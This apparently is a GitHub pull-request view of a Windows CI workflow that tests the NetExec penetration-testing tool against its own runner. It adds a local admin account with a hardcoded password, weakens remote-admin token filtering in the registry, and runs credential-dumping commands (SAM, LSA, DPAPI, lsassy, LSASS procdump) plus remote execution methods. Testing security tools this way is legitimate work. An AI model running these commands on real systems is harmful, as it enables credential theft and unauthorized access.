Add Windows workflow #16
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
name: NetExec Tests Windows | |
on: | |
pull_request: | |
branches: [ main ] | |
workflow_dispatch: | |
jobs: | |
nxc-run: | |
runs-on: windows-latest | |
# technique stolen from @Hackndo my best friend for life <3 | |
steps: | |
- name: Create new user | |
run: | | |
net user nxc Pwn3d!!! /add | |
- name: Add to local admin | |
run: | | |
net localgroup Administrators nxc /add | |
- name: Update registry key | |
run: | | |
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f | |
- name: Checkout code | |
uses: actions/checkout@v2 | |
- name: Setup Python | |
uses: actions/setup-python@v2 | |
with: | |
python-version: '3.11' | |
- name: Install poetry | |
run: | | |
pipx install poetry --python python${{ matrix.python-version }} | |
poetry --version | |
poetry env info | |
- name: Install libraries without dev group | |
run: | | |
poetry install | |
- name: Dumping some credzzzzz | |
run: | | |
poetry run netexec --debug smb %COMPUTERNAME% -u nxc -p Pwn3d!!! --sam | |
poetry run netexec --debug smb %COMPUTERNAME% -u nxc -p Pwn3d!!! --lsa | |
poetry run netexec --debug smb %COMPUTERNAME% -u nxc -p Pwn3d!!! --dpapi | |
poetry run netexec --debug smb %COMPUTERNAME% -u nxc -p Pwn3d!!! -M lsassy | |
poetry run netexec --debug smb %COMPUTERNAME% -u nxc -p Pwn3d!!! -x whoami --exec-method=smbexec | |
poetry run netexec --debug smb %COMPUTERNAME% -u nxc -p Pwn3d!!! -x whoami --exec-method=wmiexec | |
poetry run netexec --debug smb %COMPUTERNAME% -u nxc -p Pwn3d!!! -x whoami --exec-method=atexec | |
poetry run netexec --debug smb %COMPUTERNAME% -u nxc -p Pwn3d!!! -x whoami --exec-method=mmcexec | |
poetry run netexec --debug smb %COMPUTERNAME% -u nxc -p Pwn3d!!! -M procdump |